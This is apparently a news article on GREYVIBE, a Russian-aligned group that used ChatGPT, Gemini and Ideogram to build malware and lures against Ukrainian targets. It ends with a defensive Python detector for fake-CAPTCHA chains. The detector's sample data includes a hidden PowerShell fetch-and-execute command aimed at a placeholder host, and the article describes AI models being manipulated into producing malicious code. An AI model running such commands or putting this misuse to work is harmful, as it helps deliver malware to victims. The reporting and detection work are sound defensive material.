A previously undocumented threat actor with Russian-language origins and alignment with Kremlin geopolitical interests has been formally attributed by WithSecure Labs in a new report published May 29, 2026. The group, designated GREYVIBE, has conducted persistent cyberattacks against Ukrainian military, government, civilian, and business organizations since at least August 2025 — and has done so with substantial assistance from commercial AI platforms, including OpenAI ChatGPT, Google Gemini, and Ideogram AI.
The attribution adds a new actor to an already crowded field of Russian-aligned cyber operations targeting Ukraine but distinguishes itself in one key dimension: GREYVIBE is among the first documented threat actors to integrate AI tools deeply across its entire operation, from malware development to image generation to infrastructure scripting.
Who Is GREYVIBE
GREYVIBE is assessed as a Russian-speaking group operating in the Russian time zone, with activity patterns and targeting priorities that align with Kremlin intelligence interests — specifically the collection of information related to Ukraine in the context of the ongoing Russo-Ukrainian war.
The group’s victim profile is broad: military organizations, government entities, civilian infrastructure, and businesses operating in or related to Ukraine. This wide targeting footprint, combined with the group’s use of multiple delivery vectors and a variety of tools, suggests either a large team or significant AI-assisted operational scaling.
WithSecure’s attribution notes that GREYVIBE “occupies a grey area between cybercrime and state-affiliated activity” — a characterization that has become increasingly common for Russian-linked threat actors since 2022. The Kremlin has long leveraged criminal groups, patriotic hackers, and contract operators alongside its formal intelligence services (FSB, SVR, GRU), creating deliberate ambiguity about which operations are directed and which are merely tolerated or encouraged.
GREYVIBE does not consistently exhibit the operational maturity associated with more seasoned Russian APTs such as Fancy Bear (APT28) or Cozy Bear (APT29). Researchers noted “rookie mistakes” in some operations — infrastructure reuse, OPSEC slips, and inconsistent tradecraft. But the group compensates for its relative immaturity with AI-assisted productivity that lets a smaller or less experienced team punch above its weight.
AI as an Operational Force Multiplier
The most notable aspect of GREYVIBE’s operation is its systematic integration of commercial AI tools:
ChatGPT was used to assist in writing obfuscation routines, generating loader scripts, and developing post-compromise commands. Rather than hiring skilled malware developers or purchasing tools from criminal markets, GREYVIBE used ChatGPT to produce functional malicious code that would otherwise have required significant technical expertise.
Google Gemini contributed to the development of LegionRelay — a custom malware implant used by GREYVIBE across multiple campaigns. Gemini was used at various stages of LegionRelay’s development, likely for generating or refining components of the backdoor’s code.
Ideogram AI — an AI image generation platform — was used to generate images for GREYVIBE’s social engineering lures, including fake Ukrainian websites used to deliver malware to targets. The use of an AI image tool to generate convincing Ukrainian-language visual content (rather than ripping and reusing stolen images) suggests the group prioritized believability in its lure materials.
The use of ChatGPT and Gemini for offensive operations is not entirely new — researchers have documented threat actors attempting to abuse AI platforms for code generation and social engineering since 2023. But GREYVIBE’s documented use across the full attack lifecycle — from malware development to lure creation to infrastructure scripting — represents one of the most comprehensive documented examples of commercial AI integration in a state-aligned APT operation.
Both OpenAI and Google have stated policies against using their platforms for cyberattacks, and both companies actively attempt to detect and block misuse. But AI systems can be manipulated through prompt engineering to generate code that doesn’t overtly declare its malicious purpose, and determined actors have demonstrated they can extract useful offensive outputs from commercial models.
Attack Vectors and Delivery
GREYVIBE used multiple, diverse delivery mechanisms across its campaigns — a pattern that WithSecure attributes in part to the group’s AI-assisted development capability, which allows rapid iteration on different approaches without the traditional overhead of building each technique from scratch.
Spear-phishing emails remain the group’s primary vector. Targets receive emails with Ukrainian-language lures relevant to their roles — military logistical updates, government administrative notices, business communications. The emails deliver malicious attachments or links that lead to LegionRelay or other GREYVIBE implants.
Fake CAPTCHA pages — a technique with parallels to the ClickFix campaigns documented elsewhere — were used to deliver malware to less specifically targeted victims. The page presents a fake browser security challenge that instructs the visitor to copy and execute a command themselves, so the initial execution comes from the user rather than from an exploit.
Fraudulent Ukrainian adult club websites were used as a delivery mechanism for a subset of targets, likely combining social engineering with drive-by download or credential phishing. The use of AI-generated images for these sites allowed GREYVIBE to produce convincing Ukrainian-language content without native language proficiency or access to stolen Ukrainian web content.
LegionRelay
LegionRelay is GREYVIBE’s primary custom implant, developed with AI assistance. WithSecure’s report withholds full technical indicators so as not to reveal to the group how much of its activity has been attributed, but describes LegionRelay as a backdoor with standard remote access capabilities: command execution, file transfer, and persistence mechanisms.
The implant’s name and the group’s overall naming conventions suggest a degree of self-consciousness about operational identity — characteristics that sometimes accompany groups transitioning from opportunistic criminal activity to more organized, mission-oriented operations.
Why This Matters Beyond Ukraine
GREYVIBE’s primary focus is Ukraine, but its AI-assisted development model has implications beyond the current conflict. The group demonstrates that a threat actor with modest resources and technical capability — willing to make rookie mistakes — can significantly extend its operational reach using freely available AI tools.
If GREYVIBE can develop custom malware, generate convincing lure content, and build attack infrastructure using ChatGPT and Gemini, smaller criminal groups, hacktivists, and state-sponsored actors in less technically advanced nations can do the same. The barrier to entry for sophisticated-looking cyberattacks is declining, and GREYVIBE is a live case study in what that looks like in practice.
For defenders, the implication is that behavioral indicators — what an implant does, how it communicates, what it accesses — matter more than ever, since the code itself may be generated and regenerated quickly in ways that defeat signature-based detection.
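As an added example (not code from WithSecure or from the report), the following detection applies the behavioral approach to the fake-CAPTCHA delivery chain described above: because the lure makes the visitor run a command, the durable observable is a command interpreter spawned by a browser, or by explorer.exe (the Run dialog) with a command line that fetches remote or encoded content. The event field names and sample log lines are constructed for illustration.

```python
"""Behavior-based detection for the fake-CAPTCHA ("ClickFix"-style) chain.
Added example; constructed field names and sample events, not the report's data."""
import re
from typing import Iterable

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Markers of a "paste this into Run" cradle: remote fetch or encoded command.
CRADLE_RE = re.compile(r"https?://|\b(?:iwr|irm|curl|wget)\b|-enc(?:odedcommand)?\b",
                       re.IGNORECASE)

def parse_event(line: str) -> dict:
    """Parse one constructed key=value process-creation line into a dict."""
    ev = {}
    for key in ("ts", "parent", "image"):
        m = re.search(rf"\b{key}=(\S+)", line)
        ev[key] = m.group(1) if m else ""
    m = re.search(r'cmdline="([^"]*)"', line)
    ev["cmdline"] = m.group(1) if m else ""
    return ev

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_chain(ev: dict) -> bool:
    """True when parent, child and command line match the lure's behaviour."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    if image not in INTERPRETERS:
        return False
    if parent in BROWSERS:
        return True  # a browser has no legitimate reason to launch an interpreter
    return parent == "explorer.exe" and CRADLE_RE.search(ev["cmdline"]) is not None

def scan(lines: Iterable[str]) -> list:
    """Return the timestamps of events that match the chain."""
    return [ev["ts"] for ev in map(parse_event, lines) if is_clickfix_chain(ev)]

# Constructed samples: benign Run-dialog launch, lure-style cradle,
# browser-spawned interpreter, benign admin one-liner.
SAMPLE_EVENTS = [
    r'ts=2026-05-29T10:01:02Z parent=C:\Windows\explorer.exe image=C:\Windows\notepad.exe cmdline="notepad.exe"',
    r'ts=2026-05-29T10:02:15Z parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c irm https://example.invalid/v | iex"',
    r'ts=2026-05-29T10:03:40Z parent=C:\Edge\msedge.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /c ver"',
    r'ts=2026-05-29T10:05:09Z parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Get-Date"',
]
```

The rule is deliberately indifferent to the payload's code, which is the point of the passage: regenerated scripts change their signatures, but the parent/child relationship and the fetch-from-the-Run-dialog pattern do not.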
Sources
- WithSecure Labs — GREYVIBE: A Russia-nexus group leveraging AI across state-aligned operations
- The Hacker News — New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks
- SecurityWeek — Russia-Linked GreyVibe Attackers Use AI to Supercharge Cyberattacks
- SecurityAffairs — Meet GREYVIBE, the Russian-Linked Hacking Group Using AI
- CSO Online — Russia-aligned crime group Greyvibe extensively uses AI in attacks